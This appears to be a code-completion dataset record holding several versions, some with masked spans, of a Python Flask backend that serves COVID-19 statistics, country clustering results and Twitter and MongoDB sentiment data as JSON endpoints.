def deathCases(country):
array = dataEx.getData('Deaths', country).tolist()
return jsonify({'deaths': array})
@app.route('/visualisation/maxofall/<string:country>')
@cross_origin()
def maxofall(country):
array = dataEx.getMaxOfAll(country).tolist()
return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':
array[2]})
@app.route('/visualisation/newdata/<string:country>')
@cross_origin()
def NewData(country):
array = dataEx.getNewData(country)[0]
lastUpdate = dataEx.getNewData(country)[1]
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2], 'lastUpdate': lastUpdate})
@app.route('/visualisation/regionsData')
@cross_origin()
def dataByregion():
array = dataEx.getRegionsData()
return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':
array[2], 'somme': array[3]})
@app.route('/visualisation/StatistiqueMonde')
@cross_origin()
def getStatistiqueMonde():
array = dataEx.getStatistiqueMonde()
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2]})
@app.route('/visualisation/clusterAge')
@cross_origin()
def getClusterAge():
array = dataEx.getDataClusterAge()
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/clusterTest')
@cross_origin()
def getClusterTest():
array = dataEx.getDataClusterTest()
print(array)
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/ageClusterMean')
@cross_origin()
def getMeanClusterAge():
array = dataEx.getDataClusterAge()[4]
print(array)
return jsonify({'meanClusters': array.tolist()})
@app.route('/visualisation/testClusterMean')
@cross_origin()
def getMeanClusterTest():
array = dataEx.getDataClusterTest()[4]
return jsonify({'meanClusters': array.tolist()})
@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',
'tags2': ''})
@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')
@cross_origin()
def analyseSentiment(tags, tags2):
array = twitterDataExtaraction(tags, tags2)
return jsonify({'neutral': array[0], 'negative': array[1], 'positive':
array[2]})
@app.route('/mongodb/nature')
@cross_origin()
def getNature():
cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/economy')
@cross_origin()
def getEconomy():
cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/mentalhealth')
@cross_origin()
def getMentalhealth():
cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}
) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/politics')
@cross_origin()
def getPolitics():
cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/visualisation/clusteringAge')
@cross_origin()
def getClusteringAge():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({
}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
@app.route('/visualisation/clusteringTest')
@cross_origin()
def getClusteringTest():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringTest.find().skip(db.clusteringTest.count_documents
({}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
from flask import Flask, jsonify
import dataExtraction as dataEx
from flask_cors import CORS, cross_origin
from analyseSentiment import twitterDataExtaraction
from flask_pymongo import PyMongo
app = Flask(__name__)
app.config['MONGO_URI'] = 'mongodb://localhost:27017/scrapingDB'
mongo = PyMongo(app)
db = mongo.db
cors = CORS(app, resources={'/api/*': {'origins': '*'}})
@app.route('/visualisation/confirmed/<string:country>')
@cross_origin()
def confirmedCases(country):
array = dataEx.getData('Confirmed', country).tolist()
return jsonify({'confirmed': array})
@app.route('/visualisation/recovered/<string:country>')
@cross_origin()
def recoveredCases(country):
array = dataEx.getData('Recovered', country).tolist()
return jsonify({'recovered': array})
@app.route('/visualisation/death/<string:country>')
@cross_origin()
def deathCases(country):
array = dataEx.getData('Deaths', country).tolist()
return jsonify({'deaths': array})
@app.route('/visualisation/maxofall/<string:country>')
@cross_origin()
def maxofall(country):
array = dataEx.getMaxOfAll(country).tolist()
return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':
array[2]})
@app.route('/visualisation/newdata/<string:country>')
@cross_origin()
def NewData(country):
array = dataEx.getNewData(country)[0]
lastUpdate = dataEx.getNewData(country)[1]
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2], 'lastUpdate': lastUpdate})
@app.route('/visualisation/regionsData')
@cross_origin()
def dataByregion():
array = dataEx.getRegionsData()
return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':
array[2], 'somme': array[3]})
@app.route('/visualisation/StatistiqueMonde')
@cross_origin()
def getStatistiqueMonde():
array = dataEx.getStatistiqueMonde()
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2]})
@app.route('/visualisation/clusterAge')
@cross_origin()
def getClusterAge():
array = dataEx.getDataClusterAge()
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/clusterTest')
@cross_origin()
def getClusterTest():
array = dataEx.getDataClusterTest()
print(array)
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/ageClusterMean')
@cross_origin()
def getMeanClusterAge():
array = dataEx.getDataClusterAge()[4]
print(array)
return jsonify({'meanClusters': array.tolist()})
@app.route('/visualisation/testClusterMean')
@cross_origin()
def getMeanClusterTest():
array = dataEx.getDataClusterTest()[4]
return jsonify({'meanClusters': array.tolist()})
@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',
'tags2': ''})
@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')
@cross_origin()
def analyseSentiment(tags, tags2):
array = twitterDataExtaraction(tags, tags2)
return jsonify({'neutral': array[0], 'negative': array[1], 'positive':
array[2]})
@app.route('/mongodb/nature')
@cross_origin()
def getNature():
cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/economy')
@cross_origin()
def getEconomy():
cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/mentalhealth')
@cross_origin()
def getMentalhealth():
cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}
) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/politics')
@cross_origin()
def getPolitics():
cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/visualisation/clusteringAge')
@cross_origin()
def getClusteringAge():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({
}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
@app.route('/visualisation/clusteringTest')
@cross_origin()
def getClusteringTest():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringTest.find().skip(db.clusteringTest.count_documents
({}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
from flask import Flask, jsonify
import dataExtraction as dataEx
from flask_cors import CORS,cross_origin
from analyseSentiment import twitterDataExtaraction
from flask_pymongo import PyMongo
app = Flask(__name__)
app.config["MONGO_URI"] = "mongodb://localhost:27017/scrapingDB"
mongo = PyMongo(app)
db = mongo.db
cors = CORS(app, resources={r"/api/*": {"origins": "*"}})
# Visualisation service part
@app.route('/visualisation/confirmed/<string:country>')
@cross_origin()
def confirmedCases(country):
array = dataEx.getData("Confirmed",country).tolist()
return jsonify({"confirmed" : array})
@app.route('/visualisation/recovered/<string:country>')
@cross_origin()
def recoveredCases(country):
array = dataEx.getData("Recovered", country).tolist()
return jsonify({"recovered": array})
@app.route('/visualisation/death/<string:country>')
@cross_origin()
def deathCases(country):
array = dataEx.getData("Deaths", country).tolist()
return jsonify({"deaths": array})
@app.route('/visualisation/maxofall/<string:country>')
@cross_origin()
def maxofall(country):
array = dataEx.getMaxOfAll(country).tolist()
return jsonify({"confirmed" : array[0], "recovered" : array[1], "death" : array[2]})
@app.route('/visualisation/newdata/<string:country>')
@cross_origin()
def NewData(country):
array = dataEx.getNewData(country)[0]
lastUpdate = dataEx.getNewData(country)[1]
return jsonify({"totalCases" :array[0], "death" :array[1], "recovered" :array[2], "lastUpdate" :lastUpdate})
@app.route('/visualisation/regionsData')
@cross_origin()
def dataByregion():
array = dataEx.getRegionsData()
return jsonify({"regions":array[0], "affectedNum": array[1], "update": array[2], "somme":array[3]})
@app.route('/visualisation/StatistiqueMonde')
@cross_origin()
def getStatistiqueMonde():
array = dataEx.getStatistiqueMonde()
return jsonify({"totalCases": array[0], "death": array[1], "recovered": array[2]})
@app.route('/visualisation/clusterAge')
@cross_origin()
def getClusterAge():
array = dataEx.getDataClusterAge()
return jsonify({"countries": array[0].tolist(), "x": array[1].tolist(),"y":array[2].tolist(), "cluster": array[3].tolist()})
@app.route('/visualisation/clusterTest')
@cross_origin()
def getClusterTest():
array = dataEx.getDataClusterTest()
print(array)
return jsonify({"countries": array[0].tolist(), "x": array[1].tolist(),"y":array[2].tolist(), "cluster": array[3].tolist()})
@app.route('/visualisation/ageClusterMean')
@cross_origin()
def getMeanClusterAge():
array = dataEx.getDataClusterAge()[4]
print(array)
return jsonify({"meanClusters": array.tolist()})
@app.route('/visualisation/testClusterMean')
@cross_origin()
def getMeanClusterTest():
array = dataEx.getDataClusterTest()[4]
return jsonify({"meanClusters": array.tolist()})
@app.route("/analysesentiment/covid19/", defaults={'tags': '#covid19','tags2': ''})
@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')
@cross_origin()
def analyseSentiment(tags,tags2):
array = twitterDataExtaraction(tags,tags2)
return jsonify({"neutral": array[0], "negative": array[1], "positive": array[2]})
@app.route('/mongodb/nature')
@cross_origin()
def getNature():
cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)
return jsonify({"neutral": cursor[0]['neutral'], "negative": cursor[0]['negative'], "positive": cursor[0]['positive']})
@app.route('/mongodb/economy')
@cross_origin()
def getEconomy():
cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)
return jsonify({"neutral": cursor[0]['neutral'], "negative": cursor[0]['negative'], "positive": cursor[0]['positive']})
@app.route('/mongodb/mentalhealth')
@cross_origin()
def getMentalhealth():
cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}) - 1)
return jsonify({"neutral": cursor[0]['neutral'], "negative": cursor[0]['negative'], "positive": cursor[0]['positive']})
@app.route('/mongodb/politics')
@cross_origin()
def getPolitics():
cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)
return jsonify({"neutral": cursor[0]['neutral'], "negative": cursor[0]['negative'], "positive": cursor[0]['positive']})
@app.route('/visualisation/clusteringAge')
@cross_origin()
def getClusteringAge():
app.config["MONGO_URI"] = "mongodb://localhost:27017/ClusteringDB"
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({}) - 1)
return jsonify({"countries": array[0]['countries'], "x": array[0]['x'],"y":array[0]['y'], "cluster": array[0]['cluster']})
@app.route('/visualisation/clusteringTest')
@cross_origin()
def getClusteringTest():
app.config["MONGO_URI"] = "mongodb://localhost:27017/ClusteringDB"
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringTest.find().skip(db.clusteringTest.count_documents({}) - 1)
return jsonify(
{"countries": array[0]['countries'], "x": array[0]['x'], "y": array[0]['y'], "cluster": array[0]['cluster']})
if __name__ == "__main__":
app.run(debug=True)
|
flexible
|
{
"blob_id": "17505f5c14190df3311c04c19f687937481b920b",
"index": 1168,
"step-1": "<mask token>\n\n\n@app.route('/visualisation/confirmed/<string:country>')\n@cross_origin()\ndef confirmedCases(country):\n array = dataEx.getData('Confirmed', country).tolist()\n return jsonify({'confirmed': array})\n\n\n@app.route('/visualisation/recovered/<string:country>')\n@cross_origin()\ndef recoveredCases(country):\n array = dataEx.getData('Recovered', country).tolist()\n return jsonify({'recovered': array})\n\n\n<mask token>\n\n\n@app.route('/visualisation/maxofall/<string:country>')\n@cross_origin()\ndef maxofall(country):\n array = dataEx.getMaxOfAll(country).tolist()\n return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':\n array[2]})\n\n\n@app.route('/visualisation/newdata/<string:country>')\n@cross_origin()\ndef NewData(country):\n array = dataEx.getNewData(country)[0]\n lastUpdate = dataEx.getNewData(country)[1]\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2], 'lastUpdate': lastUpdate})\n\n\n@app.route('/visualisation/regionsData')\n@cross_origin()\ndef dataByregion():\n array = dataEx.getRegionsData()\n return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':\n array[2], 'somme': array[3]})\n\n\n@app.route('/visualisation/StatistiqueMonde')\n@cross_origin()\ndef getStatistiqueMonde():\n array = dataEx.getStatistiqueMonde()\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2]})\n\n\n@app.route('/visualisation/clusterAge')\n@cross_origin()\ndef getClusterAge():\n array = dataEx.getDataClusterAge()\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/clusterTest')\n@cross_origin()\ndef getClusterTest():\n array = dataEx.getDataClusterTest()\n print(array)\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/ageClusterMean')\n@cross_origin()\ndef getMeanClusterAge():\n array = dataEx.getDataClusterAge()[4]\n print(array)\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/visualisation/testClusterMean')\n@cross_origin()\ndef getMeanClusterTest():\n array = dataEx.getDataClusterTest()[4]\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',\n 'tags2': ''})\n@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')\n@cross_origin()\ndef analyseSentiment(tags, tags2):\n array = twitterDataExtaraction(tags, tags2)\n return jsonify({'neutral': array[0], 'negative': array[1], 'positive':\n array[2]})\n\n\n@app.route('/mongodb/nature')\n@cross_origin()\ndef getNature():\n cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/economy')\n@cross_origin()\ndef getEconomy():\n cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/mentalhealth')\n@cross_origin()\ndef getMentalhealth():\n cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}\n ) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/politics')\n@cross_origin()\ndef getPolitics():\n cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/visualisation/clusteringAge')\n@cross_origin()\ndef getClusteringAge():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({\n }) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\n@app.route('/visualisation/clusteringTest')\n@cross_origin()\ndef getClusteringTest():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringTest.find().skip(db.clusteringTest.count_documents\n ({}) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@app.route('/visualisation/confirmed/<string:country>')\n@cross_origin()\ndef confirmedCases(country):\n array = dataEx.getData('Confirmed', country).tolist()\n return jsonify({'confirmed': array})\n\n\n@app.route('/visualisation/recovered/<string:country>')\n@cross_origin()\ndef recoveredCases(country):\n array = dataEx.getData('Recovered', country).tolist()\n return jsonify({'recovered': array})\n\n\n@app.route('/visualisation/death/<string:country>')\n@cross_origin()\ndef deathCases(country):\n array = dataEx.getData('Deaths', country).tolist()\n return jsonify({'deaths': array})\n\n\n@app.route('/visualisation/maxofall/<string:country>')\n@cross_origin()\ndef maxofall(country):\n array = dataEx.getMaxOfAll(country).tolist()\n return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':\n array[2]})\n\n\n@app.route('/visualisation/newdata/<string:country>')\n@cross_origin()\ndef NewData(country):\n array = dataEx.getNewData(country)[0]\n lastUpdate = dataEx.getNewData(country)[1]\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2], 'lastUpdate': lastUpdate})\n\n\n@app.route('/visualisation/regionsData')\n@cross_origin()\ndef dataByregion():\n array = dataEx.getRegionsData()\n return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':\n array[2], 'somme': array[3]})\n\n\n@app.route('/visualisation/StatistiqueMonde')\n@cross_origin()\ndef getStatistiqueMonde():\n array = dataEx.getStatistiqueMonde()\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2]})\n\n\n@app.route('/visualisation/clusterAge')\n@cross_origin()\ndef getClusterAge():\n array = dataEx.getDataClusterAge()\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/clusterTest')\n@cross_origin()\ndef getClusterTest():\n array = dataEx.getDataClusterTest()\n print(array)\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/ageClusterMean')\n@cross_origin()\ndef getMeanClusterAge():\n array = dataEx.getDataClusterAge()[4]\n print(array)\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/visualisation/testClusterMean')\n@cross_origin()\ndef getMeanClusterTest():\n array = dataEx.getDataClusterTest()[4]\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',\n 'tags2': ''})\n@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')\n@cross_origin()\ndef analyseSentiment(tags, tags2):\n array = twitterDataExtaraction(tags, tags2)\n return jsonify({'neutral': array[0], 'negative': array[1], 'positive':\n array[2]})\n\n\n@app.route('/mongodb/nature')\n@cross_origin()\ndef getNature():\n cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/economy')\n@cross_origin()\ndef getEconomy():\n cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/mentalhealth')\n@cross_origin()\ndef getMentalhealth():\n cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}\n ) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/politics')\n@cross_origin()\ndef getPolitics():\n cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/visualisation/clusteringAge')\n@cross_origin()\ndef getClusteringAge():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({\n }) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\n@app.route('/visualisation/clusteringTest')\n@cross_origin()\ndef getClusteringTest():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringTest.find().skip(db.clusteringTest.count_documents\n ({}) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@app.route('/visualisation/confirmed/<string:country>')\n@cross_origin()\ndef confirmedCases(country):\n array = dataEx.getData('Confirmed', country).tolist()\n return jsonify({'confirmed': array})\n\n\n@app.route('/visualisation/recovered/<string:country>')\n@cross_origin()\ndef recoveredCases(country):\n array = dataEx.getData('Recovered', country).tolist()\n return jsonify({'recovered': array})\n\n\n@app.route('/visualisation/death/<string:country>')\n@cross_origin()\ndef deathCases(country):\n array = dataEx.getData('Deaths', country).tolist()\n return jsonify({'deaths': array})\n\n\n@app.route('/visualisation/maxofall/<string:country>')\n@cross_origin()\ndef maxofall(country):\n array = dataEx.getMaxOfAll(country).tolist()\n return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':\n array[2]})\n\n\n@app.route('/visualisation/newdata/<string:country>')\n@cross_origin()\ndef NewData(country):\n array = dataEx.getNewData(country)[0]\n lastUpdate = dataEx.getNewData(country)[1]\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2], 'lastUpdate': lastUpdate})\n\n\n@app.route('/visualisation/regionsData')\n@cross_origin()\ndef dataByregion():\n array = dataEx.getRegionsData()\n return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':\n array[2], 'somme': array[3]})\n\n\n@app.route('/visualisation/StatistiqueMonde')\n@cross_origin()\ndef getStatistiqueMonde():\n array = dataEx.getStatistiqueMonde()\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2]})\n\n\n@app.route('/visualisation/clusterAge')\n@cross_origin()\ndef getClusterAge():\n array = dataEx.getDataClusterAge()\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/clusterTest')\n@cross_origin()\ndef getClusterTest():\n array = dataEx.getDataClusterTest()\n print(array)\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/ageClusterMean')\n@cross_origin()\ndef getMeanClusterAge():\n array = dataEx.getDataClusterAge()[4]\n print(array)\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/visualisation/testClusterMean')\n@cross_origin()\ndef getMeanClusterTest():\n array = dataEx.getDataClusterTest()[4]\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',\n 'tags2': ''})\n@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')\n@cross_origin()\ndef analyseSentiment(tags, tags2):\n array = twitterDataExtaraction(tags, tags2)\n return jsonify({'neutral': array[0], 'negative': array[1], 'positive':\n array[2]})\n\n\n@app.route('/mongodb/nature')\n@cross_origin()\ndef getNature():\n cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/economy')\n@cross_origin()\ndef getEconomy():\n cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/mentalhealth')\n@cross_origin()\ndef getMentalhealth():\n cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}\n ) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/mongodb/politics')\n@cross_origin()\ndef getPolitics():\n cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)\n return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][\n 'negative'], 'positive': cursor[0]['positive']})\n\n\n@app.route('/visualisation/clusteringAge')\n@cross_origin()\ndef getClusteringAge():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({\n }) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\n@app.route('/visualisation/clusteringTest')\n@cross_origin()\ndef getClusteringTest():\n app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'\n mongo = PyMongo(app)\n db = mongo.db\n array = db.clusteringTest.find().skip(db.clusteringTest.count_documents\n ({}) - 1)\n return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],\n 'y': array[0]['y'], 'cluster': array[0]['cluster']})\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-4": "from flask import Flask, jsonify\nimport dataExtraction as dataEx\nfrom flask_cors import CORS, cross_origin\nfrom analyseSentiment import twitterDataExtaraction\nfrom flask_pymongo import PyMongo\napp = Flask(__name__)\napp.config['MONGO_URI'] = 'mongodb://localhost:27017/scrapingDB'\nmongo = PyMongo(app)\ndb = mongo.db\ncors = CORS(app, resources={'/api/*': {'origins': '*'}})\n\n\n@app.route('/visualisation/confirmed/<string:country>')\n@cross_origin()\ndef confirmedCases(country):\n array = dataEx.getData('Confirmed', country).tolist()\n return jsonify({'confirmed': array})\n\n\n@app.route('/visualisation/recovered/<string:country>')\n@cross_origin()\ndef recoveredCases(country):\n array = dataEx.getData('Recovered', country).tolist()\n return jsonify({'recovered': array})\n\n\n@app.route('/visualisation/death/<string:country>')\n@cross_origin()\ndef deathCases(country):\n array = dataEx.getData('Deaths', country).tolist()\n return jsonify({'deaths': array})\n\n\n@app.route('/visualisation/maxofall/<string:country>')\n@cross_origin()\ndef maxofall(country):\n array = dataEx.getMaxOfAll(country).tolist()\n return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':\n array[2]})\n\n\n@app.route('/visualisation/newdata/<string:country>')\n@cross_origin()\ndef NewData(country):\n array = dataEx.getNewData(country)[0]\n lastUpdate = dataEx.getNewData(country)[1]\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2], 'lastUpdate': lastUpdate})\n\n\n@app.route('/visualisation/regionsData')\n@cross_origin()\ndef dataByregion():\n array = dataEx.getRegionsData()\n return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':\n array[2], 'somme': array[3]})\n\n\n@app.route('/visualisation/StatistiqueMonde')\n@cross_origin()\ndef getStatistiqueMonde():\n array = dataEx.getStatistiqueMonde()\n return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':\n array[2]})\n\n\n@app.route('/visualisation/clusterAge')\n@cross_origin()\ndef getClusterAge():\n array = dataEx.getDataClusterAge()\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/clusterTest')\n@cross_origin()\ndef getClusterTest():\n array = dataEx.getDataClusterTest()\n print(array)\n return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),\n 'y': array[2].tolist(), 'cluster': array[3].tolist()})\n\n\n@app.route('/visualisation/ageClusterMean')\n@cross_origin()\ndef getMeanClusterAge():\n array = dataEx.getDataClusterAge()[4]\n print(array)\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/visualisation/testClusterMean')\n@cross_origin()\ndef getMeanClusterTest():\n array = dataEx.getDataClusterTest()[4]\n return jsonify({'meanClusters': array.tolist()})\n\n\n@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',\n 'tags2': ''})\n@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')\n@cross_origin()\ndef analyseSentiment(tags, tags2):\n array = twitterDataExtaraction(tags, tags2)\n return jsonify({'neutral': array[0], 'negative': array[1], 'positive':\n 